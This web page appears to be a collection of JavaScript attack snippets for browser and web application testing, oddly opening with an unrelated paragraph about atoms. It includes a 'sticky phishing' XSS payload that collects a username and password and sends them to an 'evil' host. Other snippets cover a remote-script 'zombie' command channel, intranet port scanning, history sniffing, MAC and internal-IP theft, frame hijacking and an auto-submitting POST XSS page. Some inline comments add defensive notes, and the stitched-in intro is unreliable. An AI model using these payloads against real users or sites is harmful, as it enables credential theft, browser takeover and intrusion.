Atom Database
An atom is the smallest part of a substance that can exist and still retain the properties of that substance. All familiar matter consists of atoms. An atom consists of a positively charged nucleus and orbiting electrons. The simplest atom is hydrogen (one proton and one electron), and the largest atom found in nature is uranium (92 protons, 92 electrons, and 146 neutrons). KU
The purpose of this project is to collect useful attack snippets that can be employed when performing web application security testing.
Archived Comments
getNetInfo
Retrieve network information. By using this function attackers can retrieve information about the local NATed IP address and host name. This information is highly sensitive since it enables attackers to conduct attacks on Intranet resources.
// LiveConnect probe: page script drives java.net.Socket directly. Only the
// LiveConnect-enabled browsers tagged below ever exposed this bridge, and it
// has since been removed from mainstream browsers.
function getNetInfo() {
var sock = new java.net.Socket();
// Bind to every local interface on an ephemeral port.
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
// Connect back to the page's own host (port 80 when the URL has none); the
// socket's local end then carries the client's internal (pre-NAT) address,
// which is what the caller is after.
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
// Returns {domain, ip} of the local end of the connection. The socket is never
// closed here; it is left for the JVM to reclaim.
return {domain: sock.getLocalAddress().getHostName(), ip: sock.getLocalAddress().getHostAddress()};
}
Firefox, Opera, Live Connect, JavaScript, Information Gathering
Freeze
Freeze the browser for a defined time, given in milliseconds. While frozen, users are unable to interact with the browser. Certain browsers may terminate the script if the time value is too high. Attackers can use this function to force the browser to wait until a certain remote event occurs.
/**
 * Busy-wait for `time` milliseconds on the main thread. Nothing else on the
 * page runs while it spins, so a large value is a self-inflicted denial of
 * service and some browsers will abort the script.
 * @param {number} time - spin duration in milliseconds
 */
function freeze(time) {
  for (var start = new Date(); new Date() - start < time;) {
    // intentionally empty: the condition does the waiting
  }
}
All Browsers, JavaScript, freeze, DoS
googleAjaxSearch
Perform searches with Google from the browser. This technique can be employed by attackers to build self-propagating Ajax worms: the worm finds new targets via Google and uses your browser to attack them.
// JSONP search through Google's former "uds/GwebSearch" endpoint. Google shut
// that API down years ago, so the snippet is mainly of historical interest.
function googleAjaxSearch(callback, query, key, context) {
// Lazily create the registry of pending JSONP callbacks.
if (googleAjaxSearch.callbacks == undefined)
googleAjaxSearch.callbacks = new Array();
var key = (key == undefined)?'internal-documentation':key;
var context = (context == undefined)?0:context;
var script = document.createElement('script');
script.defer = true;
script.type = 'text/javascript';
// NOTE(review): `query` and `key` are concatenated without encodeURIComponent,
// and `callbacks.length` stays 0 because handlers are stored as named
// properties rather than pushed, so every call registers 'callback0'.
// The response executes as script with the page's privileges; a CSP
// script-src that excludes the endpoint blocks the load outright.
script.src = 'http://www.google.com/uds/GwebSearch?callback=googleAjaxSearch.callbacks.callback' + googleAjaxSearch.callbacks.length + '&context=' + context + '&lstkp=0&rsz=large&hl=en&q=' + query + '&key=' + key + '&v=0.1';
// JSONP entry point: drops the script tag, unregisters itself and hands the
// raw results to the caller.
googleAjaxSearch.callbacks['callback' + googleAjaxSearch.callbacks.length] = function (context, results, status) {
document.body.removeChild(script);
delete googleAjaxSearch.callbacks['callback' + googleAjaxSearch.callbacks.length];
callback(results, query, key, context, status);
};
document.body.appendChild(script);
}
All Browsers, JavaScript, Google, search
portScan
Perform port scanning. This is not the only way attackers can perform port scanning. You need to adjust the timeout value to get the most useful result; this technique can be quite inaccurate at times.
// Image-based timing probe: a load or error event that arrives before the
// timer fires is reported as "open", a timeout as "closed". Both onload and
// onerror map to true, which is one reason the description warns about
// accuracy.
function portScan(callback, target, ports, timeout) {
var timeout = (timeout == null)?100:timeout;
// NOTE(review): `index` is assigned without `var`, so it is an implicit global
// shared by every closure created below.
for (index = 0; index < ports.length; index++)
// `new function () {...}` only serves to give each iteration its own `img`.
new function () {
var img = new Image();
img.onload = img.onerror = function () {
if (!img) return; // already reported by the timer
img = undefined;
callback(target, ports[index], true);
};
// Browsers refuse a built-in list of restricted ports and block mixed-content
// image loads from https pages, which limits coverage; a burst of image
// requests to non-HTTP ports from one client is a recognisable pattern in
// proxy and network logs.
img.src = 'http://' + target + ':' + ports[index];
window.setTimeout(function () {
if (!img) return; // load/error event already won
img = undefined;
callback(target, ports[index], false);
}, timeout);
};
}
All Browsers, JavaScript, portscan
getURLJ
Retrieve remote content by using Java LiveConnect. This function is well suited to cases where a binary file has to be downloaded. Works only on LiveConnect-enabled browsers.
// LiveConnect fetch via java.net.URL from page script. Only the LiveConnect
// browsers tagged below exposed this bridge; current browsers do not.
function getURLJ(url) {
// NOTE(review): starts as null, and `null += str` coerces to the string
// "null", so the returned data is prefixed with the four characters "null".
var data = null;
var destination = new java.net.URL(url);
// 64 KiB Java byte[] read buffer.
var buffer = java.lang.reflect.Array.newInstance(java.lang.Byte.TYPE, 65536);
// assumes getContent() yields an InputStream for this URL — TODO confirm
var stream = destination.getContent();
while (true) {
var count = stream.read(buffer);
if (count <= 0)
break;
// Decodes the chunk with the JVM default charset; a multi-byte character split
// across two reads is corrupted, so the result is text, not raw bytes.
var str = new java.lang.String(buffer, 0, count);
data += str;
}
// Only reached on a clean EOF; an exception from read() skips the close.
stream.close();
return data;
}
Firefox, Opera, Live Connect, JavaScript
zombie
Attach a zombie. This function performs requests to "url" on a regular basis (at the given interval). The retrieved data is evaluated as JavaScript.
// Beacon/command channel: every `interval` ms (default 2000) a new <script>
// pointing at `url` is injected, so whatever the server returns executes with
// the page's privileges. Each tick appends another element and never removes
// the old ones, and the setInterval handle is not returned, so the polling
// cannot be stopped by the caller. Defensively, a CSP script-src that does not
// allow the remote origin blocks the load, and fixed-period requests to a
// single URL are easy to spot in proxy logs.
function zombie(url, interval) {
var interval = (interval == null)?2000:interval;
setInterval(function () {
var script = document.createElement('script');
script.defer = true;
script.type = 'text/javascript';
script.src = url;
document.body.appendChild(script);
}, interval);
}
All Browsers, JavaScript, zombie
getDocument
Retrieve the document object in a cross-browser manner. This function is very useful when the attacker wants to read the content of a particular iframe or frame.
/**
 * Resolve the document object for the page itself or for a frame element,
 * trying the property names different engines expose in turn.
 * @param {HTMLIFrameElement|HTMLFrameElement|Window} [target] - frame to
 *   look into; omitted (or null) means the current page
 * @returns {Document}
 * @throws {string} the literal 'unable to get document object' when none of
 *   the known properties is present
 */
function getDocument(target) {
  if (target == undefined) {
    return document;
  }
  var frameDoc = target.contentDocument;
  if (frameDoc) {
    return frameDoc;
  }
  var frameWindow = target.contentWindow;
  if (frameWindow) {
    return frameWindow.document;
  }
  if (target.document) {
    return target.document;
  }
  throw 'unable to get document object';
}
All Browsers, JavaScript, document, iframe
historyScan
Scan the user's history. This function enumerates which of the given links the current user has visited by checking their computed style.
/**
 * Cross-browser accessor for a Document: the page's own when `target` is
 * omitted, otherwise the one belonging to the given frame element or window.
 * This is a second copy of the helper defined earlier on the page, kept so
 * that historyScan below is self-contained.
 * @param {Object} [target]
 * @returns {Document}
 * @throws {string} the literal message 'unable to get document object'
 */
function getDocument(target) {
  if (target == undefined) return document;
  if (target.contentDocument) return target.contentDocument;
  if (target.contentWindow) return target.contentWindow.document;
  if (target.document) return target.document;
  throw 'unable to get document object';
}
// CSS :visited probe: writes a stylesheet that hides visited links into a
// hidden iframe, then reads each candidate link's computed display value.
// Browsers stopped exposing :visited through computed style long ago, so this
// does not work on current releases.
function historyScan(callback, URLs) {
var iframe = document.createElement('iframe');
iframe.style.visibility = 'hidden';
document.body.appendChild(iframe);
var doc = getDocument(iframe);
doc.open();
doc.write('<style>a:visited{display: none}</style>');
doc.close();
// NOTE(review): `index` is assigned without `var` (implicit global).
for (index = 0; index < URLs.length; index++) {
var a = doc.createElement('a');
a.href = URLs[index];
doc.body.appendChild(a);
// `display` is declared twice with var; both branches assign the same variable.
if (a.currentStyle)
var display = a.currentStyle['display']; // legacy IE path
else
var display = doc.defaultView.getComputedStyle(a, null).getPropertyValue('display')
// Reports true when the visited rule applied.
callback(URLs[index], display == 'none'?true:false);
}
document.body.removeChild(iframe);
}
All Browsers, JavaScript, history, scan
b64encode
This function encodes a string in base64 format.
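/**
 * Base64-encode a "binary string": each UTF-16 code unit of `input` is
 * treated as one byte, so only characters U+0000–U+00FF round-trip
 * correctly (UTF-8-encode text first if it may contain anything else).
 * @param {string} input - string whose code units are the bytes to encode
 * @returns {string} standard alphabet (A–Z a–z 0–9 + /) with '=' padding;
 *   '' for an empty input
 */
function b64encode(input) {
  var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  var result = '';
  // A counted loop over 3-byte groups; the original do/while ran its body
  // once even for '' and produced 'AA==' for the empty string.
  for (var i = 0; i < input.length; i += 3) {
    var chr1 = input.charCodeAt(i);
    var chr2 = input.charCodeAt(i + 1); // NaN past the end
    var chr3 = input.charCodeAt(i + 2);
    var enc1 = chr1 >> 2;
    var enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); // NaN >> n is 0
    var enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
    var enc4 = chr3 & 63;
    // Missing trailing bytes become '=' padding (alphabet index 64).
    if (isNaN(chr2)) {
      enc3 = enc4 = 64;
    } else if (isNaN(chr3)) {
      enc4 = 64;
    }
    result += b64chars.charAt(enc1) + b64chars.charAt(enc2) + b64chars.charAt(enc3) + b64chars.charAt(enc4);
  }
  return result;
}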
JavaScript, Cross-platformed, base64, Encodings
b64decode
This function decodes base64 strings.
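/**
 * Decode base64 into a "binary string" (one UTF-16 code unit per byte).
 * Characters outside the alphabet (whitespace, line breaks) are ignored and
 * missing trailing padding is tolerated.
 * @param {string} input - base64 text, optionally padded with '='
 * @returns {string} decoded bytes as code units 0–255; '' for empty input
 */
function b64decode(input) {
  var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  var cleaned = String(input).replace(/[^A-Za-z0-9\+\/\=]/g, '');
  var result = '';
  // Sextet at `pos`; positions past the end count as '=' padding. The original
  // used indexOf(charAt(pos)) which, for an out-of-range pos, is indexOf('')
  // === 0 and so emitted stray NUL bytes (three of them for an empty input).
  function sextet(pos) {
    return pos < cleaned.length ? b64chars.indexOf(cleaned.charAt(pos)) : 64;
  }
  for (var i = 0; i < cleaned.length; i += 4) {
    var enc1 = sextet(i);
    var enc2 = sextet(i + 1);
    var enc3 = sextet(i + 2);
    var enc4 = sextet(i + 3);
    result += String.fromCharCode((enc1 << 2) | (enc2 >> 4));
    // Second and third bytes exist only when their sextets are not padding.
    if (enc3 != 64) {
      result += String.fromCharCode(((enc2 & 15) << 4) | (enc3 >> 2));
    }
    if (enc4 != 64) {
      result += String.fromCharCode(((enc3 & 3) << 6) | enc4);
    }
  }
  return result;
}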
JavaScript, Cross-platformed, base64, Encodings
Firefox B64 Functions
These functions are part of the javascript window object in the Gecko engine.
// Native window helpers (originally Gecko-only, now in every browser): btoa()
// encodes and atob() decodes. Both work on Latin-1 "binary strings"; a code
// unit above U+00FF makes btoa throw (InvalidCharacterError), so UTF-8-encode
// text first when it may contain other characters.
alert (btoa("test"));
alert (atob("dGVzdA=="));
JavaScript, Firefox, base64, Encodings
include
Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations.
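/**
 * Load a remote script by writing a <script> tag into the document stream.
 * Loading is asynchronous, so the script's declarations are not available
 * until it has run. Calling this after the page has finished parsing makes
 * document.write() reopen and replace the document.
 * @param {string} url - script location; written into the src attribute
 */
function include(url) {
  // Escape the characters that would terminate the attribute or the tag so a
  // url value cannot inject extra markup into the written string (&amp; in an
  // attribute value still resolves to a plain & when the src is fetched).
  var safeUrl = String(url)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
  // The tag is split across string literals so this source survives being
  // embedded inside another <script> block.
  document.write('<' + 'script src="' + safeUrl + '" language="javascript" type="text/javascript"' + '>' + '<' + '/script' + '>');
}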
JavaScript, All Browsers, include, modules
include
Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations. For that reason you may want to use the onload callback function.
/**
 * Inject a script element for `url` into the body. Loading is asynchronous,
 * so code that needs the script's declarations must run from `onload`.
 * @param {string} url - script location
 * @param {Function} [onload] - invoked once the script has loaded
 */
function include(url, onload) {
  var el = document.createElement('script');
  el.type = 'text/javascript';
  el.onload = onload;
  el.src = url;
  document.body.appendChild(el);
}
Mozilla, Firefox, Opera, include, modules
forcefocus
This function can be used to force focus onto a particular element of the current DOM.
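/**
 * Keep re-focusing `target` forever: focus it now and again every `timeout`
 * milliseconds. There is no handle to stop it, so it runs for the life of the
 * page.
 * @param {{focus: Function}} target - element (anything with focus()) to focus
 * @param {number} [timeout=500] - delay between refocus attempts, in ms
 */
function forcefocus(target, timeout) {
  var delay = (timeout == undefined) ? 500 : timeout;
  target.focus();
  setTimeout(function () {
    // Pass the delay through: the original re-entered without it, so every
    // repeat after the first silently fell back to 500 ms.
    forcefocus(target, delay);
  }, delay);
}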
All Browsers, focus
walkJSON
This function walk the entire JSON (the j parameter) tree. The c parameter is the function that handles walked nodes.
// Depth-first visit of every enumerable property (own and inherited, since
// for...in is used) of a parsed JSON value; c(key, value) is called for each.
// NOTE(review): recursion goes through arguments.callee, which throws a
// TypeError in strict-mode code (ES modules, 'use strict'); calling walkJSON
// by name would behave the same everywhere else. Cyclic inputs recurse
// without bound.
function walkJSON(j, c) {
// No-op unless a visitor function was supplied.
if (typeof(c) != 'function') {
return;
}
for (var i in j) {
c(i, j[i]);
// Arrays are objects, so the instanceof test is redundant; typeof null is
// also 'object', which is harmless because for...in over null visits nothing.
if (j[i] instanceof Array || typeof(j[i]) == 'object') {
arguments.callee(j[i], c);
}
}
}
universal
parseURL
This function parse the URL into an object.
// Hand-rolled URL splitter that mimics window.location's field names.
// NOTE(review): REGEX.exec() returns null when the input does not match (an
// empty string, for instance) and the loop below then throws a TypeError;
// callers should guard for that, or use the standard URL constructor where it
// is available. Credentials are matched as \w+ only.
function parseURL(url) {
var REGEX = /^((\w+):\/\/)?((\w+):?(\w+)?@)?([^\/\?:]+):?(\d+)?(\/?[^\?#]+)?\??([^#]+)?#?(\w*)/;
// Capture-group index for each output field; 0 is the whole match, so `href`
// is the matched text rather than necessarily the full input. `host` and
// `hostname` both map to group 6, so `host` never carries the port.
var fields = {'href': 0, 'username' : 4, 'password' : 5, 'port' : 7, 'protocol' : 2, 'host' : 6, 'hostname' : 6, 'pathname' : 8, 'search' : 9, 'hash' : 10};
var result = new Object();
var r = REGEX.exec(url);
for (var field in fields) {
result[field] = r[fields[field]];
}
// Normalise optional parts to location-like strings ('#' / '?' when absent).
result.hash = result.hash?'#' + result.hash:'#';
result.search = result.search?'?' + result.search:'?';
result.username = result.username?result.username:'';
result.password = result.password?result.password:'';
// Default the port from the scheme. An explicit port stays a string (regex
// capture) while these defaults are numbers; unknown schemes get ''.
if (result.port == undefined) {
switch (result.protocol) {
case 'http':
result.port = 80;
break;
case 'https':
result.port = 443;
break;
case 'ftp':
result.port = 21;
break;
default:
result.port = '';
break;
}
}
return result;
}
universal
STICKY PHISHING
This payload launches a phishing attack against the user. It is "sticky" because it keeps prompting the victim for a username and password until both have been entered. Once obtained they are forwarded to a third-party site. Ideal for persistent XSS attacks.
do{a=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your USERNAME","");b=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your PASSWORD","");} while(a==null || b==null || a=="" || b=="");alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
JavaScript, Universal, Password Theft
POST METHOD XSS
Attack HTML page for XSS vulnerabilities that can only be exploited through a POST request (as opposed to GET).
<html>
<!-- this page would be hosted on the attacker's site and the victim would need to be tricked into visiting it -->
<!-- Defender note: the form auto-submits a cross-site POST whose `param`
     field carries a script payload. Contextual output encoding of `param`
     on the server is the fix for the reflection itself, and an unpredictable
     anti-CSRF token on the endpoint (or SameSite cookies) stops the forged
     submission from being accepted at all. -->
<form method="post" action="http://target/vulnerable.jsp">
<input type="text" name="param" value='<script>alert("XSS")</script>'>
</form>
<script>document.forms[0].submit();</script>
</html>
Universal, HTML, JavaScript
MAC ADDRESS
You can steal the user's MAC address with Java 1.6. For Internet Explorer you can use an applet. This information is very sensitive, because the MAC address is a unique identifier. Although it can be easily changed by the user, it can be useful to identify some users with dynamic IP address or using proxies.
// LiveConnect enumeration of java.net.NetworkInterface from page script. Only
// the LiveConnect browsers tagged below exposed this bridge; current browsers
// do not, so the fingerprinting risk described above no longer applies to them.
function get_mac() {
try {
var ifaces = java.net.NetworkInterface.getNetworkInterfaces()
var ifaces_list = java.util.Collections.list(ifaces);
for (var i = 0; i < ifaces_list.size(); i++) {
// First interface with a hardware address wins; the value is a Java byte[]
// (interfaces without one, e.g. loopback, return null and are skipped).
var mac = ifaces_list.get(i).getHardwareAddress();
if (mac) {
return mac;
}
}
// Any failure (no Java bridge, SecurityException) is swallowed and reported
// as the `false` return below.
} catch (e) { }
return false;
}
Firefox, Opera, Live Connect, Java SE 6, JavaScript, Information Gathering
Framejack
Hijack the current user's browser window. This technique employs a single 100%x100% frame that sits on top of the currently exploited remote content. While the user interacts with the browser window or tab, the attacker's state persists. This state is lost as soon as the user moves to another URL.
All Browsers, JavaScript, hijack, frame, persistency